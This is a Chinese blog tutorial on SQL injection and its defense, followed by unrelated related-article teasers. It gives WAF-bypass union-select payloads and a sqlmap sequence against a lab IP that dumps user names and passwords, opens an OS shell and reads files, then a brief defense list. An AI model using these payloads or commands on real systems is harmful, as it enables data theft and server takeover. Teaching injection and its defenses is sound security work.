网络安全之SQL注入及防御(下篇)

目录

什么是SQL注入?

一,SQL注入会导致什么呢?

二,SQL注入思想与步骤

三,SQL注入的绕过

四,sqlmap工具的使用

 五,sql注入的防御方法

总结

什么是SQL注入?

SQL注入(SQL Injection)是一种常见的网络攻击手段,是因为应用程序对用户输入的数据验证不到位造成的。攻击者在应用程序的输入字段中插入恶意的SQL代码,在应用程序未授权的情况下执行任意的SQL语句。

一,SQL注入会导致什么呢?

1,数据泄露:我们的账号密码,个人身份信息的等等

2,数据篡改:篡改商品的价格,学生成绩等等

3,数据删除:删除某些数据

4,拒绝服务攻击(DoS):利用SQL注入制作大量查询和复杂的操作导致系统资源耗尽

5,提权攻击:利用SQL注入提升权限执行系统命令等

6,绕过身份验证:利用SQL注入绕过身份验证使得攻击者管理员特权身份

二,SQL注入思想与步骤

1,找到注入点

2,获取对方数据库名字

3,获取对方数据库中有那些表

4,获取表中有哪些字段

5,获取字段表中的数据

三,SQL注入的绕过

开启waf

注入sql代码:

union select 1,2,3,select database()

可以看到被防火墙拦截了

那么怎么办呢?

这种情况下get的提交方式不行,就用post加特殊字符过滤绕过检测

sql注入代码:

        ?id=1/**&id=-1%20union%20select%201,2,3,database/**/()%23*/

 /**/在数据库中是注释符号,%20是空格,%23是#

web服务器参数获取函数获取到的参数
PHP/Apache$_GET("par")最后一个
JSP/TomcatRequest.getParameter("par")第一个
Perl(CGI)/ApacheParam("par")第一个
Python/ApacheGetvalue("par")所有的
ASP/IISRequest.QueryString("par")所有的

利用数据库的特性

sql注入代码:

?id=-1%20union%20/*!44509select*/%201,2,3,4

四,sqlmap工具的使用

sqlmap 是一个开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库,现在非常强了,都能自动绕过waf了。

这是一个kali linux自带的工具

1,检测网站是否存在sql注入漏洞

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2'

2,查看当前数据库

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --current-db

3,查看数据库中有那些表

 sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' -D jrlt --tables

 4,查看表中有那些字段

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' -D jrlt -T users --columns

5, 列出其中的数据

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' -D jrlt -T users -C name,password --dump

6,执行sql语句

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --sql-shell

7, 爆破数据库弱密码

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --password

 8,执行系统命令

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --os-shell

9,读取系统文件

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --file-read "D:\1.txt" 

 五,sql注入的防御方法

1,过滤

【1】限制参数的长度

【2】过滤掉恶意代码(例如:select,union,order by,update)

2,转义

把用户输入的数据当成文本

3,数据库安全控制

【1】设置权限

【2】数据加密

4,进行预编译

总结

时代在发展,科技在进步,在当下一日千里的时代我们今天学的东西明天可能就过时了,有时候绕过waf时非常轻松,但是过了一段时间发现同样的方法已经绕不过了,那咋办呢?凉拌?那当然是保持学习,与时俱进,网络安全不就是道高一尺魔高一丈嘛,网络安全技术在升级,我们也应当保持积极学习的心态,去挖掘其中的奥义,积极吸取他人的经验。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/2981884.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

C++|模板进阶(非类型模板参数+特化)

C++|模板进阶(非类型模板参数+特化)

目录 一、非类型模板参数 二、模板特化 2.1函数模板特化 2.2类模板特化 2.2.1全特化 2.2.2偏特化 三、模板不支持分离编译 四、模板优缺点 一、非类型模板参数 在模板初阶中,所学习的模板的参数是类型形参,但其实还有非类型形参。 类型形参&am…
阅读更多...
gcc make makefile cmake之间的关系梳理

gcc make makefile cmake之间的关系梳理

gcc是GNU Compiler Collection(GNU编译器套件),也可以简单认为是编译器,它可以编译很多编程语言(包括C、C、Object-C、Fortran、Java等)当你的程序只有一个源文件,直接用gcc命令编译它。但是当你…
阅读更多...
系统思考—啤酒游戏

系统思考—啤酒游戏

最近有不少的合作伙伴来询问我啤酒游戏这个来自于MIT(麻省理工学院)经典的沙盘,上周刚刚结束Midea旗下的一家公司市场运营部《啤酒游戏沙盘-应对动态性复杂的系统思考智慧》的课程。 参与这次沙盘体验的团队成员深刻体会到了全局思考的重要性…
阅读更多...
GDPU unity游戏开发 碰撞体与关节

GDPU unity游戏开发 碰撞体与关节

让你设计的角色跑起来吧,可以是动画,也可以是碰撞器的运动。 运动小车 找到小车素材,导入到层级面板。然后可以新建一个地面让小车在上面运动,新建一个方块当障碍物。 摆放好后,要加组件。记住,在unity中运…
阅读更多...
02 VMware下载安装银河麒麟(Kylin)系统

02 VMware下载安装银河麒麟(Kylin)系统

02 VMware下载&安装银河麒麟(Kylin)系统 一、官网1、官网地址 二、下载1、官网下载(1)服务器操作系统(2)申请试用(3)产品试用申请(4)点击下载连接即可 2、…
阅读更多...
SQL基础(关系模型)

SQL基础(关系模型)

目录 SQL及定义域概念 SQL是什么 定义域 关系简介 关系的定义 关系的封闭性 关系模型简介 关系模型 谓词逻辑 运算基础 SQL的加减乘除 SQL的除法1 SQL的除法2 SQL的除法3 三值逻辑 NULL的危害 消除NULL SQL及定义域概念 SQL是什么 Structured Query Languag…
阅读更多...
泽众RPA1.1.2产品升级,新增团队管理、用户管理、工作空间及自动化任务等功能,大幅提升工作效率

泽众RPA1.1.2产品升级,新增团队管理、用户管理、工作空间及自动化任务等功能,大幅提升工作效率

泽众RPA1.1.2产品升级,通过新增团队管理模块、用户管理模块、工作空间功能、定时任务功能以及Excel和网络指令,解决了团队协作与权限管理不精细、任务自动化水平有限以及数据处理和网络操作功能局限等问题。升级后的产品不仅提升了工作效率和团队协作能力…
阅读更多...
【Qt常用控件】—— 显示类控件

【Qt常用控件】—— 显示类控件

目录 1.1 Label 1.2 LCD Number 1.3 ProgressBar 1.4 Calendar Widget 1.5 小结 1.1 Label QLabel 控件是 Qt 中用于显示文本或图像的部件,是用户界面开发中常用的组件之一。 核⼼属性如下: 属性 说明 text QLabel 中的⽂本 textFormat ⽂本的格…
阅读更多...
MySQL主从结构搭建

MySQL主从结构搭建

说明:本文介绍如何搭建MySQL主从结构; 原理 主从复制原理如下: (1)master数据写入,更新binlog; (2)master创建一个dump线程向slave推送binlog; &#xff…
阅读更多...
小瓶清洗桶抗酸碱耐高温PFA清洗器半导体实验清洗用

小瓶清洗桶抗酸碱耐高温PFA清洗器半导体实验清洗用

PFA清洗桶,也叫PFA清洗器、PFA小瓶清洗桶,主要用于清洗浸泡实验室小型PFA溶样罐和烧杯等,带有密封螺纹盖,可以用于摇晃,高纯耐高温材质可放置电热板上加热使用。 特点:可拆卸倒酸口,可安全倒出酸…
阅读更多...
网络安全是否有需求

网络安全是否有需求

● 由于网络威胁数量不断增加,网络安全的需求很高。 ● 组织正在大力投资网络安全以保护其数据。 ● 就业市场缺乏熟练的网络安全专业人员。 ● 网络安全认证可以提升您在网络安全领域的职业前景。 ● 持续学习并了解最新的安全趋势在该领域至关重要。 随着对技术和…
阅读更多...
如何优雅地Spring事务编程

如何优雅地Spring事务编程

本文已收录至Github,推荐阅读 👉 Java随想录 微信公众号:Java随想录 在开发中,有时候我们需要对 Spring 事务的生命周期进行监控,比如在事务提交、回滚或挂起时触发特定的逻辑处理。那么如何实现这种定制化操作呢&am…
阅读更多...
windows安装nssm并将jar打包为服务

windows安装nssm并将jar打包为服务

一、nssm 下载地址 二、安装nssm服务 将下载的压缩包复制到安装目录进行解压,解压后有两个版本 win32 和 win64,根据系统选择。打开系统 powershell 命令窗口,进入安装目录指定版本目录,就可以使用nssm服务了。 # 安装服务&…
阅读更多...
接口测试和Mock学习路线(中)

接口测试和Mock学习路线(中)

1.什么是 swagger Swagger 是一个用于生成、描述和调用 RESTful 接口的 WEB 服务。 通俗的来讲,Swagger 就是将项目中所有想要暴露的接口展现在页面上,并且可以进行接口调用和测试的服务。 现在大部分的项目都使用了 swagger,因为这样后端…
阅读更多...
SV-7041T IP网络有源音箱 教室广播多媒体音箱(带本地扩音功能)教学广播音箱 办公室背景音乐广播音箱 2.0声道壁挂式网络有源音箱

SV-7041T IP网络有源音箱 教室广播多媒体音箱(带本地扩音功能)教学广播音箱 办公室背景音乐广播音箱 2.0声道壁挂式网络有源音箱

SV-7041T IP网络有源音箱 教室广播多媒体音箱(带本地扩音功能) 教学广播音箱 办公室背景音乐广播音箱 一、描述 SV-7041T是深圳锐科达电子有限公司的一款2.0声道壁挂式网络有源音箱,具有10/100M以太网接口,可将网络音源通过自带…
阅读更多...
汇编期末复习知识点

汇编期末复习知识点

参考文献1 第一章 概述 组成 计算机系统由硬件子系统和软件子系统组成。硬件子系统:组成计算机系统的所有电子的,机械的,光学的和磁性的元部件。 计算机中常用进制数表示 十进制(Decimal):数据尾部加一后缀D,如2355D二进制&a…
阅读更多...
TFTLCD时序介绍(ILI9341 8080并口时序)

TFTLCD时序介绍(ILI9341 8080并口时序)

ILI9341 8080并口 ILI9341是一个常见的TFT LCD显示控制器,用于驱动各种小型和中型尺寸的液晶显示屏。它支持多种分辨率,最常见的是240x320像素。ILI9341控制器具有内置的GRAM(Graphics RAM),可以通过SPI或8位并行接口…
阅读更多...
初学python,怎样入门?

初学python,怎样入门?

答案:乌龟绘图。 "乌龟绘图"通常指的是使用Logo语言的变种——Python中的turtle模块来进行图形绘制。在turtle模块中,一只名为“海龟”(Turtle)的小动物会在屏幕上移动,根据其行进路径来绘制图形。以下是一段…
阅读更多...
百面算法工程师 | 激活函数 Activate Function

百面算法工程师 | 激活函数 Activate Function

目录 10.1激活函数作用: 10.2 为什么激活函数都是非线性的 10.3 常见激活函数的优缺点及其取值范围 10.4 激活函数问题的汇总 10.4.1 Sigmoid的缺点,以及如何解决 10.4.2 ReLU在零点可导吗,如何进行反向传播 10.4.3 Softmax溢出怎么处…
阅读更多...
如何解决非法采砂、过度开采的乱象?

如何解决非法采砂、过度开采的乱象?

非法采砂和过度开采是当今世界面临的重要环境问题之一。这些行为不仅破坏了生态平衡,还对河道安全、水资源保护等产生了严重影响。然而,经过多年的努力,河道采砂管理工作不断加强,全国采砂秩序总体可控。为了更有效地解决这一问题…
阅读更多...
最新文章

Copyright @ 2022~2023